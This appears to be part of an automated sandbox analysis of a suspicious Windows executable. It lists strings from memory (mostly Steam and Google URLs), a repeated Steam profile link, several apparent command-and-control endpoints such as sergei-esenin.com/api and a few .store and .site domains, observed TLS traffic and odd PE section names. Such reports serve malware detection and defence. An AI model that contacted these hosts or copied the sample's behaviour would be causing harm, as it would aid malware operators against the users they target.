    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000002.2148763674.000000000168A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Gu9gs5hf
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=M7aU
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=IZH_ONwLX4kw&l=e
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampo
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowe
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000002.2148574776.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://licendfilteo.site:443/api
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiY
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apib
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apif
    Source: file.exe, 00000000.00000002.2148574776.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/i
    Source: file.exe, 00000000.00000002.2148574776.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
    Source: file.exe, 00000000.00000002.2148574776.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spirittunek.store:443/api
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.f
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000002.2148763674.000000000168A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000002.2148763674.000000000168A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000002.2148574776.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persis
    Source: file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000002.2148763674.000000000168A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.stx
    Source: file.exe, 00000000.00000002.2148574776.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://studennotediw.store:443/api
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49710 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49711 version: TLS 1.2

    System Summary

    barindex
    PE file contains section with special chars
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA02280_2_00BA0228
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDA0D00_2_00BDA0D0
